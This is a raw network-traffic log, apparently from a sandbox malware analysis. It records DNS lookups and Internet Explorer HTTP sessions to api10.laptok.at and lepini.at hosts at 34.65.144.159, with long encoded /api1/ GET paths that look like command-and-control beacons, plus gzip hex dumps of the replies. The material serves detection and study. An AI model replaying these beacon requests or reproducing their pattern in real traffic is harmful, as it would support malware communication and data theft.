Feb 15, 2021 21:26:14.172207117 CET	53	53813	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:15.036911964 CET	63732	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:15.099294901 CET	53	63732	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:15.213633060 CET	57344	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:15.265760899 CET	53	57344	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:16.454019070 CET	54450	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:16.513926983 CET	53	54450	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:17.642267942 CET	59261	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:17.701730013 CET	53	59261	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:31.835122108 CET	57151	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:31.885976076 CET	53	57151	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:33.817640066 CET	59413	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:33.872474909 CET	53	59413	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:34.826550007 CET	59413	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:34.878036022 CET	53	59413	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:35.049802065 CET	60516	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:35.098500013 CET	53	60516	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:35.859178066 CET	59413	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:35.910677910 CET	53	59413	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:36.063472986 CET	60516	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:36.112749100 CET	53	60516	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:37.071190119 CET	60516	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:37.120393991 CET	53	60516	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:37.868421078 CET	59413	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:37.920197010 CET	53	59413	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:39.073786020 CET	60516	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:39.124480009 CET	53	60516	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:41.880002022 CET	59413	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:41.931582928 CET	53	59413	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:43.082843065 CET	60516	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:43.131458044 CET	53	60516	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:43.263675928 CET	51649	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:43.323553085 CET	53	51649	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:44.941044092 CET	65086	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:45.008936882 CET	53	65086	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:45.277362108 CET	56432	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:45.339874029 CET	53	56432	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:45.445666075 CET	52929	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:45.494220972 CET	53	52929	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:46.542140007 CET	64317	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:46.846108913 CET	53	64317	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:49.186588049 CET	61004	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:49.246994019 CET	53	61004	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:50.084008932 CET	56895	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:50.146209955 CET	53	56895	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:50.620853901 CET	62372	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:50.683176041 CET	53	62372	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:02.578643084 CET	61515	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:02.640185118 CET	53	61515	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:31.385003090 CET	56675	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:31.436376095 CET	53	56675	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:39.532502890 CET	57172	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:39.821945906 CET	53	57172	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:49.079586029 CET	55267	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:49.082242012 CET	50969	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:49.128356934 CET	53	55267	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:49.130829096 CET	53	50969	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:49.667834044 CET	64362	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:49.726691961 CET	53	64362	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:50.630992889 CET	54766	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:50.688483000 CET	53	54766	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:51.838350058 CET	61446	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:51.898437023 CET	53	61446	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:01.330615044 CET	57515	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:01.398981094 CET	53	57515	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:30.030843973 CET	58199	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:30.079400063 CET	53	58199	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:30.584244013 CET	65221	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:30.644023895 CET	53	65221	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:31.193239927 CET	61573	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:31.250427008 CET	53	61573	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:31.901190996 CET	56562	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:31.960284948 CET	53	56562	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:32.341228008 CET	53591	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:32.403213024 CET	53	53591	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:32.968156099 CET	59688	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:33.026062012 CET	53	59688	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:34.117602110 CET	56032	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:34.168524981 CET	53	56032	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:34.773286104 CET	61150	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:34.823050022 CET	53	61150	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:35.605218887 CET	63458	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:35.662259102 CET	53	63458	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:36.069313049 CET	50422	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:36.128927946 CET	53	50422	8.8.8.8	192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 15, 2021 21:26:05.789064884 CET | 192.168.2.5 | 8.8.8.8 | 0xac24 | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:09.017072916 CET | 192.168.2.5 | 8.8.8.8 | 0xa9c0 | Standard query (0) | web.vortex.data.msn.com | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:09.495734930 CET | 192.168.2.5 | 8.8.8.8 | 0x2ff | Standard query (0) | geolocation.onetrust.com | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:09.783668995 CET | 192.168.2.5 | 8.8.8.8 | 0x53e8 | Standard query (0) | contextual.media.net | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:11.728142977 CET | 192.168.2.5 | 8.8.8.8 | 0x1abe | Standard query (0) | lg3.media.net | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:14.101337910 CET | 192.168.2.5 | 8.8.8.8 | 0x4575 | Standard query (0) | hblg.media.net | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:15.036911964 CET | 192.168.2.5 | 8.8.8.8 | 0xe967 | Standard query (0) | cvision.media.net | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:15.213633060 CET | 192.168.2.5 | 8.8.8.8 | 0x5df8 | Standard query (0) | srtb.msn.com | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:16.454019070 CET | 192.168.2.5 | 8.8.8.8 | 0x53db | Standard query (0) | img.img-taboola.com | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:43.263675928 CET | 192.168.2.5 | 8.8.8.8 | 0xa1d5 | Standard query (0) | api10.laptok.at | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:46.542140007 CET | 192.168.2.5 | 8.8.8.8 | 0x2695 | Standard query (0) | api10.laptok.at | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:50.084008932 CET | 192.168.2.5 | 8.8.8.8 | 0x74df | Standard query (0) | api10.laptok.at | A (IP address) | IN (0x0001)
Feb 15, 2021 21:27:39.532502890 CET | 192.168.2.5 | 8.8.8.8 | 0x874c | Standard query (0) | c56.lepini.at | A (IP address) | IN (0x0001)
Feb 15, 2021 21:27:49.079586029 CET | 192.168.2.5 | 8.8.8.8 | 0x362d | Standard query (0) | resolver1.opendns.com | A (IP address) | IN (0x0001)
Feb 15, 2021 21:27:49.082242012 CET | 192.168.2.5 | 8.8.8.8 | 0x4cf5 | Standard query (0) | resolver1.opendns.com | A (IP address) | IN (0x0001)
Feb 15, 2021 21:27:49.667834044 CET | 192.168.2.5 | 8.8.8.8 | 0x54f6 | Standard query (0) | api3.lepini.at | A (IP address) | IN (0x0001)
Feb 15, 2021 21:27:50.630992889 CET | 192.168.2.5 | 8.8.8.8 | 0xf41a | Standard query (0) | api3.lepini.at | A (IP address) | IN (0x0001)
Feb 15, 2021 21:27:51.838350058 CET | 192.168.2.5 | 8.8.8.8 | 0xfc4 | Standard query (0) | api3.lepini.at | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 15, 2021 21:26:05.837735891 CET | 8.8.8.8 | 192.168.2.5 | 0xac24 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001)
Feb 15, 2021 21:26:09.076967955 CET | 8.8.8.8 | 192.168.2.5 | 0xa9c0 | No error (0) | web.vortex.data.msn.com | web.vortex.data.microsoft.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 15, 2021 21:26:09.550903082 CET | 8.8.8.8 | 192.168.2.5 | 0x2ff | No error (0) | geolocation.onetrust.com | - | 104.20.184.68 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:09.550903082 CET | 8.8.8.8 | 192.168.2.5 | 0x2ff | No error (0) | geolocation.onetrust.com | - | 104.20.185.68 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:09.847328901 CET | 8.8.8.8 | 192.168.2.5 | 0x53e8 | No error (0) | contextual.media.net | - | 23.210.250.97 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:11.795772076 CET | 8.8.8.8 | 192.168.2.5 | 0x1abe | No error (0) | lg3.media.net | - | 23.210.250.97 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:14.172207117 CET | 8.8.8.8 | 192.168.2.5 | 0x4575 | No error (0) | hblg.media.net | - | 23.210.250.97 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:15.099294901 CET | 8.8.8.8 | 192.168.2.5 | 0xe967 | No error (0) | cvision.media.net | cvision.media.net.edgekey.net | - | CNAME (Canonical name) | IN (0x0001)
Feb 15, 2021 21:26:15.265760899 CET | 8.8.8.8 | 192.168.2.5 | 0x5df8 | No error (0) | srtb.msn.com | www.msn.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 15, 2021 21:26:15.265760899 CET | 8.8.8.8 | 192.168.2.5 | 0x5df8 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001)
Feb 15, 2021 21:26:16.513926983 CET | 8.8.8.8 | 192.168.2.5 | 0x53db | No error (0) | img.img-taboola.com | tls13.taboola.map.fastly.net | - | CNAME (Canonical name) | IN (0x0001)
Feb 15, 2021 21:26:16.513926983 CET | 8.8.8.8 | 192.168.2.5 | 0x53db | No error (0) | tls13.taboola.map.fastly.net | - | 151.101.1.44 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:16.513926983 CET | 8.8.8.8 | 192.168.2.5 | 0x53db | No error (0) | tls13.taboola.map.fastly.net | - | 151.101.65.44 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:16.513926983 CET | 8.8.8.8 | 192.168.2.5 | 0x53db | No error (0) | tls13.taboola.map.fastly.net | - | 151.101.129.44 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:16.513926983 CET | 8.8.8.8 | 192.168.2.5 | 0x53db | No error (0) | tls13.taboola.map.fastly.net | - | 151.101.193.44 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:43.323553085 CET | 8.8.8.8 | 192.168.2.5 | 0xa1d5 | No error (0) | api10.laptok.at | - | 34.65.144.159 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:46.846108913 CET | 8.8.8.8 | 192.168.2.5 | 0x2695 | No error (0) | api10.laptok.at | - | 34.65.144.159 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:26:50.146209955 CET | 8.8.8.8 | 192.168.2.5 | 0x74df | No error (0) | api10.laptok.at | - | 34.65.144.159 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:27:39.821945906 CET | 8.8.8.8 | 192.168.2.5 | 0x874c | No error (0) | c56.lepini.at | - | 34.65.144.159 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:27:49.128356934 CET | 8.8.8.8 | 192.168.2.5 | 0x362d | No error (0) | resolver1.opendns.com | - | 208.67.222.222 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:27:49.130829096 CET | 8.8.8.8 | 192.168.2.5 | 0x4cf5 | No error (0) | resolver1.opendns.com | - | 208.67.222.222 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:27:49.726691961 CET | 8.8.8.8 | 192.168.2.5 | 0x54f6 | No error (0) | api3.lepini.at | - | 34.65.144.159 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:27:50.688483000 CET | 8.8.8.8 | 192.168.2.5 | 0xf41a | No error (0) | api3.lepini.at | - | 34.65.144.159 | A (IP address) | IN (0x0001)
Feb 15, 2021 21:27:51.898437023 CET | 8.8.8.8 | 192.168.2.5 | 0xfc4 | No error (0) | api3.lepini.at | - | 34.65.144.159 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• api10.laptok.at
• c56.lepini.at
• api3.lepini.at

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49755 | 34.65.144.159 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Feb 15, 2021 21:26:43.380824089 CET | 3073 | OUT | GET /api1/QSqnACLeyr6hdgRM/z5FskeEfxxW4Q1R/GsITkxgk46HCnUm5Kd/11eB4QB_2/FS2OIfou_2BVahhCN2i1/lN05g44fSdWuZ34SVM_/2F18tQh3ZP_2B9CZltVRIM/NAJawsHjH4mX4/XILaVciO/5e8TUIFZ7ccd8Dn_2F8wtDN/DA_2BihyHs/BqbIiQ7x5yFYJOUsg/scHsHuDvL_2F/a38zFWCcfG3/xo4sCKeZx_2FgB/qzrd3KTzhXtd1iKJfTVBW/TIaj2x4Rf3CB0n8w/wlBMav7PHwJXLsZ/IliJcWNYhk60Yrdjmm/3OHtbL5dY/ANYcc2W_2Bf_2FIiYenV/jXNvqJX5m02G5/F HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive
Feb 15, 2021 21:26:43.847129107 CET | 3074 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Feb 2021 20:26:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49756 | 34.65.144.159 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Feb 15, 2021 21:26:44.306616068 CET | 3287 | OUT | GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: api10.laptok.at
Connection: Keep-Alive
Feb 15, 2021 21:26:44.431600094 CET | 3287 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 15 Feb 2021 20:26:44 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49760 | 34.65.144.159 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Feb 15, 2021 21:26:46.909322977 CET | 3346 | OUT | GET /api1/9a3FdV_2FOe2lNWBzywhye/a2rzbdQuOhRbh/1tMI9TP_/2FFHpcEjc2zIsj3nY_2FaRD/bbKOnK6Aw9/T9Li8ZpaG0hs_2FEE/_2B0kgl3vplN/HPMJmXJvTbm/kjHzz19HUtkaT1/4BDTN7ZVSNKtMR3H5nP4a/s8_2F3CxujepwtCo/By36bxNYadNwz_2/FEk2aSXfXLicJH7n4U/7D_2FTfi5/cc2nrD5Ag2qXRkQmnDt6/1GTWH5aoTuyoAdeDUx1/UqFEv13ML45n9P1f5D7a2h/spqio1V138YVU/_2FSoCJL/_2BPfPH_2FwmC1xDPsgb90b/lJFlQYaXBd/gV1Ci2eCEez/TspIchn HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive
Feb 15, 2021 21:26:47.384097099 CET | 3374 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Feb 2021 20:26:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 7a 83 50 10 46 1f 28 0b dc 96 b8 4b 70 d8 21 c1 dd e1 e9 4b bb ec 97 92 70 ef cc 3f e7 90 5b bc 31 37 2b 68 26 65 55 4b 91 92 ab 92 ab e1 70 70 58 e5 e7 58 97 69 84 d0 e0 93 41 f4 11 d9 40 08 ee b9 6c 9a 02 4f 18 29 46 c5 1e a1 02 11 c1 8c 8e 6e 3a 47 d0 cf 75 10 ad 31 a4 03 6d d4 01 5f b3 87 30 b7 92 73 d8 f0 49 a6 93 bb 09 40 18 89 cb 85 e6 82 86 12 9a 05 a8 f8 f5 cb 7a 3f 34 32 08 3b 7b f4 4a 28 04 c6 51 78 e0 f7 4b a4 29 9d be e6 8d 84 a1 a2 b1 3c ab eb 88 92 9c fe ad ca 58 cd 29 b2 90 6f a4 66 83 39 58 b9 10 b5 96 04 22 8f 23 60 36 31 b8 ee b9 85 d5 f5 65 ae 8e c7 5a 9f 8f ec 16 3a c6 85 9f df 19 86 86 53 f6 48 f2 c4 1d c4 cf 5a 30 71 54 14 07 3d 64 95 8a 36 6f 75 43 20 1f e0 c7 6e d2 37 ef bd 8f 20 cc 1e f7 45 c2 61 6a 57 22 68 0a b5 ce 46 15 39 aa 2b 7a 8a fd 94 78 84 f6 58 dd 2f 9f 53 e0 9f 76 68 d8 1f b5 cb 69 67 69 d7 7c 05 ba 87 2b 1a 37 fd 1c 37 cd ee 2b 55 cb b2 5d a6 8f 49 52 31 2f 7c 52 27 9b b0 81 52 32 a8 58 e5 56 a7 8c ec 84 b0 ef 06 46 ee e5 03 7a e9 c3 70 c8 5d 2c 54 b9 41 a8 7f 77 43 3a bd e7 37 bb 85 70 54 30 fe 61 8c 4b 07 ac d3 c0 6e 53 a9 7e 4f 62 c4 d3 77 22 66 6a e3 1c 63 6d 73 ce 2d b6 7b 46 55 72 2c d4 92 8d 0f 08 7b fa 4f 87 ed 04 a0 67 39 36 5c a7 67 05 58 b0 86 09 51 a7 d4 d7 9a ba 4a 00 71 24 39 1a 3b a1 85 c0 9f 92 de 62 da af 05 19 90 33 ca a9 61 08 6b f9 48 9d 44 50 a5 95 30 e7 8e 84 50 ce d3 3f 24 ed ec bd d7 c4 68 21 4d 7a e5 cf 23 35 fd 4b 39 b4 0a 9f 09 0c 61 f4 23 6e 42 31 77 db 0f 95 0b f7 9e 72 09 d4 4c 1a b7 71 10 81 1f 46 f2 f9 b8 67 b9 2f 32 92 b3 72 7a 9e 62 7b b9 1f 87 60 b6 96 7d 60 6f f5 3b 12 18 af e3 33 dd fe ec ee 42 a0 18 8c bf 36 bd ce b8 d2 67 c4 eb eb b9 af 08 6d d9 f1 0b a1 0a 12 e0 7a 40 7e 9d 6c 1b 68 07 f6 1c cc eb 1e 26 67 6b 9e 90 be c6 30 12 20 
8c ff 48 01 c6 ed 69 ad e9 3e 6b 36 fe 37 7f 11 b2 a1 07 37 e5 0a b3 07 f6 cf ca 44 5c 6a fe e8 73 62 1a 4d 04 b8 e5 fe e9 c8 b7 a6 4e c2 c4 b5 bd 11 b1 3a 61 ad c5 f7 ae 52 aa 02 0c c0 47 dd 26 d7 7c d3 dc c8 39 11 de 3e 14 2b 8f 67 60 da 3e 93 39 3b fe e0 72 45 7d 19 c7 f6 ae 4b 54 d5 bc 7a ee ce 2d 16 d8 f0 95 6e 7b d9 43 c8 3d ee 8f 21 8b 16 f0 b1 dc e9 21 97 6c b6 91 c9 f2 22 8e e3 62 9a 78 4a d4 85 64 20 82 8f 3d 86 b2 c5 a1 63 5a b9 f1 24 3c 15 0e 0c 1d fa e0 9f f0 44 4c 46 2a 06 99 d9 20 94 73 a7 69 de d5 7d f6 95 64 78 18 70 f9 1d 17 62 90 12 29 7a 9e 3c 64 df ba 43 13 a3 45 75 4b 6c 31 0b 9d 15 b3 b6 da af eb 2f 9f 24 96 7a 29 c2 c3 59 2b 5a f8 94 eb a5 ae a2 79 ef f2 0f 3d b2 41 a1 9e a6 64 41 14 51 c6 3b db a6 f7 28 21 67 6d 0a 1e ae ef f7 f0 cb 21 2a eb 88 6d ea 96 b9 6b 1c 33 e3 ad e8 5e 10 85 50 33 e2 b7 37 bf 25 1f b2 2e 16 fa 4b 05 6f b7 25 01 e7 bb 5d 47 a7 08 1b ea f4 2a 21 91 00 56 3f 19 17 7f e4 1b 32 16 64 ce 8c e5 a3 80 4e 42 95 ec 41 17 c1 79 41 78 39 5f b8 00 e5 f1 85 25 c4 00 22 05 28 48 86 e4 3b 36 7d a9 ee fd c3 b2 2a 59 81 f0 58 0e 2b d4 b1 2c 39 b1 b8 14 1b e1 0b e5 93 19 90 f2 86 ed 75 aa c7 96 ef 32 d5 a9 07 71 07 83 ed 7e 84 7b b5 0a 43 15 e0 41 3d 30 5c 93 92 78 35 ed 01 59 d1 6a e9 9d 3a 23 f2 df 07 aa a1 21 41 eb 00 72 e7 d9 83 61 45 1d a2 35 0f 35 d1 e6 bc
                                                                                                                                                                                                    Data Ascii: 2000zPF(Kp!Kp?[17+h&eUKppXXiA@lO)Fn:Gu1m_0sI@z?42;{J(QxK)<X)of9X"#`61eZ:SHZ0qT=d6ouC n7 EajW"hF9+zxX/Svhigi|+77+U]IR1/|R'R2XVFzp],TAwC:7pT0aKnS~Obw"fjcms-{FUr,{Og96\gXQJq$9;b3akHDP0P?$h!Mz#5K9a#nB1wrLqFg/2rzb{`}`o;3B6gmz@~lh&gk0 Hi>k677D\jsbMN:aRG&|9>+g`>9;rE}KTz-n{C=!!l"bxJd =cZ$<DLF* si}dxpb)z<dCEuKl1/$z)Y+Zy=AdAQ;(!gm!*mk3^P37%.Ko%]G*!V?2dNBAyAx9_%"(H;6}*YX+,9u2q~{CA=0\x5Yj:#!AraE55


Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49761 | Destination IP: 34.65.144.159 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp: Feb 15, 2021 21:26:47.958450079 CET | kBytes transferred: 3641 | Direction: OUT
Data:
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: api10.laptok.at
Connection: Keep-Alive

Timestamp: Feb 15, 2021 21:26:48.081315994 CET | kBytes transferred: 3641 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 15 Feb 2021 20:26:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49763 | Destination IP: 34.65.144.159 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp: Feb 15, 2021 21:26:50.211947918 CET | kBytes transferred: 3662 | Direction: OUT
Data:
GET /api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm6BSIFzHirA83QDIG_/2FbmOJUxF8/ud5_2Fql9hZq1SzAT/Mwor9Yan0pTL/Fp7ZNYW1P4i/kA3p_2Ft9A_2Fs/RuUNpyL5CsQBX14_2BDvT/1fDvmlCtb0dss45p/clOsmGOkIAiGzqR/LxhkYHtCoZLc014ID_/2BtL4MOOe/oIJGNpJMiO7LF1VXD1cY/3TSy0R_2FzpOndwhSFh/jEmLA5uqXYEdrQwipf8a_2/FYxkdf4zOPfe0/vr4tnHHd/_2Fh2Azy7z8mKYRQWXwGF6y/SDOEEBL HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive

Timestamp: Feb 15, 2021 21:26:50.666774988 CET | kBytes transferred: 3666 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Feb 2021 20:26:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Data Raw: 37 36 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 94 35 b2 ad 00 00 43 17 44 81 5b f1 0b e0 e2 ee d2 e1 ee ce ea ff eb 33 93 49 ce 24 af 04 77 c5 49 30 a8 12 a5 a8 b6 a2 5f 8b 54 b2 76 d5 66 ff 0d 57 1e 19 f4 a9 6d 4f b3 8e 5d 45 3e 09 2d 0c e2 b5 e8 b3 78 a7 0e 77 9b 12 07 06 8a 34 67 0b 51 e1 e3 63 ff d2 ba 88 2a d0 67 de 7e 35 cb 0f 69 99 96 72 61 db 7b 64 dc e9 f2 d6 a6 75 f4 53 a0 da 04 4e 16 a0 fc 4e ed c7 26 8a 5a ea 13 9a 6e ed 08 0b 7c cc 3a 04 f3 0e 55 97 6e e6 ab 00 c3 c8 6a 3e 3d 02 cc c5 94 d7 1a 93 3d c4 4d 8c 9d e5 36 2c 6b 04 b0 a2 35 67 c4 32 d5 e1 dd e7 70 62 be a2 0e 18 bc 38 ba ab b1 7a 36 52 97 d5 24 07 50 19 12 89 13 47 0d 36 af 5b bb fa cd cb b8 0a f6 31 6f c5 40 c9 03 8d 2d 41 90 b6 41 4f ad da 6b 65 9e 25 e9 71 cd af da a4 99 